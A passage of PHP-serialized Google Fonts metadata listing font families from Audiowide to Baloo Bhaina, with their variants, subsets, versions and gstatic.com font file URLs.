:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/audiowide/v16/l7gdbjpo0cum0ckerWCtkQXPExpQBw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:106;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Autour One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/autourone/v24/UqyVK80cP25l3fJgbdfbk5lWVscxdKE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:107;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Average\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/average/v16/fC1hPYBHe23MxA7rIeJwVWytTyk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:108;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Average Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/averagesans/v16/1Ptpg8fLXP2dlAXR-HlJJNJPBdqazVoK4A.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:109;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Averia Gruesa Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/averiagruesalibre/v22/NGSov4nEGEktOaDRKsY-1dhh8eEtIx3ZUmmJw0SLRA8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:110;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Averia Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-11\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/averialibre/v16/2V0FKIcMGZEnV6xygz7eNjEarovtb07t-pQgTw.ttf\";s:9:\"300italic\";s:87:\"http://fonts.gstatic.com/s/averialibre/v16/2V0HKIcMGZEnV6xygz7eNjESAJFhbUTp2JEwT4Sk.ttf\";s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/averialibre/v16/2V0aKIcMGZEnV6xygz7eNjEiAqPJZ2Xx8w.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/averialibre/v16/2V0EKIcMGZEnV6xygz7eNjESAKnNRWDh8405.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/averialibre/v16/2V0FKIcMGZEnV6xygz7eNjEavoztb07t-pQgTw.ttf\";s:9:\"700italic\";s:87:\"http://fonts.gstatic.com/s/averialibre/v16/2V0HKIcMGZEnV6xygz7eNjESAJFxakTp2JEwT4Sk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:111;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Averia Sans Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:95:\"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6SaxZG_G5OvCf_rt7FH3B6BHLMEd3lMKcQJZP1LmD9.ttf\";s:9:\"300italic\";s:98:\"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6caxZG_G5OvCf_rt7FH3B6BHLMEdVLKisSL5fXK3D9qtg.ttf\";s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6XaxZG_G5OvCf_rt7FH3B6BHLMEeVJGIMYDo_8.ttf\";s:6:\"italic\";s:94:\"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6RaxZG_G5OvCf_rt7FH3B6BHLMEdVLEoc6C5_8N3k.ttf\";s:3:\"700\";s:95:\"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6SaxZG_G5OvCf_rt7FH3B6BHLMEd31N6cQJZP1LmD9.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6caxZG_G5OvCf_rt7FH3B6BHLMEdVLKjsVL5fXK3D9qtg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:112;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Averia Serif Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIVzD2ms4wxr6GvjeD0X88SHPyX2xYGCSmqwacqdrKvbQ.ttf\";s:9:\"300italic\";s:100:\"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIbzD2ms4wxr6GvjeD0X88SHPyX2xYOpzMmw60uVLe_bXHq.ttf\";s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIWzD2ms4wxr6GvjeD0X88SHPyX2xY-pQGOyYw2fw.ttf\";s:6:\"italic\";s:96:\"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIUzD2ms4wxr6GvjeD0X88SHPyX2xYOpwuK64kmf6u2.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIVzD2ms4wxr6GvjeD0X88SHPyX2xYGGS6qwacqdrKvbQ.ttf\";s:9:\"700italic\";s:100:\"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIbzD2ms4wxr6GvjeD0X88SHPyX2xYOpzM2xK0uVLe_bXHq.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:113;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Azeret Mono\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfnPRh0raa-5s3AA.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfHPVh0raa-5s3AA.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfwvVh0raa-5s3AA.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfnPVh0raa-5s3AA.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfrvVh0raa-5s3AA.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfQvJh0raa-5s3AA.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfe_Jh0raa-5s3AA.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfHPJh0raa-5s3AA.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfNfJh0raa-5s3AA.ttf\";s:9:\"100italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLaJkLye2Z4nAN7J.ttf\";s:9:\"200italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLYJkbye2Z4nAN7J.ttf\";s:9:\"300italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLbXkbye2Z4nAN7J.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLaJkbye2Z4nAN7J.ttf\";s:9:\"500italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLa7kbye2Z4nAN7J.ttf\";s:9:\"600italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLZXlrye2Z4nAN7J.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLZulrye2Z4nAN7J.ttf\";s:9:\"800italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLYJlrye2Z4nAN7J.ttf\";s:9:\"900italic\";s:98:\"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLYglrye2Z4nAN7J.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:114;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"B612\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/b612/v12/3JnySDDxiSz32jm4GDigUXw.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/b612/v12/3Jn8SDDxiSz36juyHBqlQXwdVw.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/b612/v12/3Jn9SDDxiSz34oWXPDCLTXUETuE.ttf\";s:9:\"700italic\";s:70:\"http://fonts.gstatic.com/s/b612/v12/3Jn_SDDxiSz36juKoDWBSVcBXuFb0Q.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:115;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"B612 Mono\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/b612mono/v12/kmK_Zq85QVWbN1eW6lJl1wTcquRTtg.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/b612mono/v12/kmK5Zq85QVWbN1eW6lJV1Q7YiOFDtqtf.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/b612mono/v12/kmK6Zq85QVWbN1eW6lJdayv4os9Pv7JGSg.ttf\";s:9:\"700italic\";s:80:\"http://fonts.gstatic.com/s/b612mono/v12/kmKkZq85QVWbN1eW6lJV1TZkp8VLnbdWSg4x.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:116;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"BIZ UDGothic\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:9:\"greek-ext\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/bizudgothic/v6/daafSTouBF7RUjnbt8p3LuKttQN98z_MbQ.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/bizudgothic/v6/daaASTouBF7RUjnbt8p3LuKVCSxZ-xTQZMhbaA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:117;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"BIZ UDMincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:9:\"greek-ext\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/bizudmincho/v6/EJRRQgI6eOxFjBdKs38yhtW1dwT7rcpY8Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:118;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"BIZ UDPGothic\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:9:\"greek-ext\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/bizudpgothic/v6/hES36X5pHAIBjmS84VL0Bue83nUMQWkMUAk.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/bizudpgothic/v6/hESq6X5pHAIBjmS84VL0Bue85skjZWEnTABCSQo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:119;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"BIZ UDPMincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:9:\"greek-ext\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/bizudpmincho/v6/ypvfbXOBrmYppy7oWWTg1_58nhhYtUb0gZk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:120;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Babylonica\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/babylonica/v2/5aUw9_i2qxWVCAE2aHjTqDJ0-VVMoEw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:121;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Bad Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/badscript/v16/6NUT8F6PJgbFWQn47_x7lOwuzd1AZtw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:122;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Bahiana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/bahiana/v19/uU9PCBUV4YenPWJU7xPb3vyHmlI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:123;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Bahianita\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/bahianita/v17/yYLr0hTb3vuqqsBUgxWtxTvV2NJPcA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:124;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Bai Jamjuree\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa0kePuk5A1-yiSgA.ttf\";s:9:\"200italic\";s:87:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_oGkpox2S2CgOva.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa09eDuk5A1-yiSgA.ttf\";s:9:\"300italic\";s:87:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_pikZox2S2CgOva.ttf\";s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDI1apSCOBt_aeQQ7ftydoaMWcjKm7sp8g.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIrapSCOBt_aeQQ7ftydoa8W8LOub458jGL.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa0reHuk5A1-yiSgA.ttf\";s:9:\"500italic\";s:87:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_o6kJox2S2CgOva.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa0gebuk5A1-yiSgA.ttf\";s:9:\"600italic\";s:87:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_oWl5ox2S2CgOva.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa05efuk5A1-yiSgA.ttf\";s:9:\"700italic\";s:87:\"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_pylpox2S2CgOva.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:125;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Bakbak One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/bakbakone/v6/zOL54pXAl6RI-p_ardnuycRuv-hHkOs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:126;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Ballet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/ballet/v21/QGYyz_MYZA-HM4NjuGOVnUEXme1I4Xi3C4G-EiAou6Y.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:127;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Baloo 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/baloo2/v14/wXK0E3kTposypRydzVT08TS3JnAmtdgazapv9Fat7WcN.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/baloo2/v14/wXK0E3kTposypRydzVT08TS3JnAmtdgozapv9Fat7WcN.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/baloo2/v14/wXK0E3kTposypRydzVT08TS3JnAmtdjEyqpv9Fat7WcN.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/baloo2/v14/wXK0E3kTposypRydzVT08TS3JnAmtdj9yqpv9Fat7WcN.ttf\";s:3:\"800\";s:86:\"http://fonts.gstatic.com/s/baloo2/v14/wXK0E3kTposypRydzVT08TS3JnAmtdiayqpv9Fat7WcN.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:128;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Baloo Bhai 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/baloobhai2/v19/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNighMXeCo-jsZzo.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/baloobhai2/v19/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNhohMXeCo-jsZzo.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/baloobhai2/v19/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNvYmMXeCo-jsZzo.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/baloobhai2/v19/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNs8mMXeCo-jsZzo.ttf\";s:3:\"800\";s:97:\"http://fonts.gstatic.com/s/baloobhai2/v19/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNqgmMXeCo-jsZzo.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:129;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Baloo Bhaijaan 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/baloobhaijaan2/v8/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TyRSqP4L4ppfcyC.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/baloobhaijaan2/v8/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TyjSqP4L4ppfcyC.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/baloobhaijaan2/v8/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TxPTaP4L4ppfcyC.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/baloobhaijaan2/v8/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8Tx2TaP4L4ppfcyC.ttf\";s:3:\"800\";s:105:\"http://fonts.gstatic.com/s/baloobhaijaan2/v8/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TwRTaP4L4ppfcyC.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:130;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Baloo Bhaina 